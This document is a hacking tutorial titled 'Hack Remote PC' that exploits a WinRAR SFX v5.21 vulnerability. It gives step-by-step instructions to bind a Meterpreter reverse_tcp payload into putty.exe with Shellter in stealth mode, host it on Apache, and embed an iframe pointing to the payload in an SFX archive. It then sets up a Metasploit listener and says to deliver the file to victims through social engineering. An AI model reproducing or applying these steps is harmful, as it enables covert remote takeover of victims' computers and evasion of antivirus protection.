
Hack Remote PC using WinRAR SFX Remote Code Execution Vulnerability

Remote code execution vulnerability has been discovered in the official WInRAR SFX v5.21 software.The vulnerability allows remote attackers to unauthorized execute system specific code to compromise a target system.
The issue is located in the Text and Icon function of the Text to display in SFX window module. Remote attackers are able to generate own compressed archives with malicious payloads to execute system specific codes for compromise the attackers .
 Download Shellter from here, shellter version is latest release, no antivirus has detected till now. After downloading shellter unzip the archive file
 Set the location of shellter and type “wine shellter.exe

A terminal opens and choose operation mode as auto (a)

Now choose an executable file and copy to shellter folder to bind the shellter with any .exe file
 here in my case I have copied putty.exe as a file to bind with shellter.exe
Note: only executable file can be binded

Now it asks for PE target after choosing operation method, give the filename .exe and binding process will start.

When prompted to enable stealth mode enter “Y”

When the binding is processed it will ask for the type of payload we want to use I have choose l for listed payload and then choose 1 for Meterpreter_reverse_tcp
 Now give the lhost which is ip address of kali linux and lport as 4444

After giving all the options you will get a confirmation like Injection: verified! Press enter to continue.

Now you will get encrypted putty.exe file in shelter directory.

Move Putty.exe file to var/www/html directory.

Start apache services.

Now patch putty.exe path in winrar utility tool. Right click on winrar . Select add to Archive option.

Select Create SFX archive option.

Select on Advanced and click on SFX options.

Now Select Text and Icon option and type the path of putty.exe file with iframe tag follows.
<iframe src=http://192.168.1.5/putty.exe></iframe>   Click on OK.

Now send this Winrar file to victim PC using any Social Engineering Technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.5
exploit
Now send your putty.exe files to victim using any social engineering technique. Now when the victim will use putty you will get the meterpreter of victim PC.

Note: This Vulnerability Found by Mohammad Reza Espargham
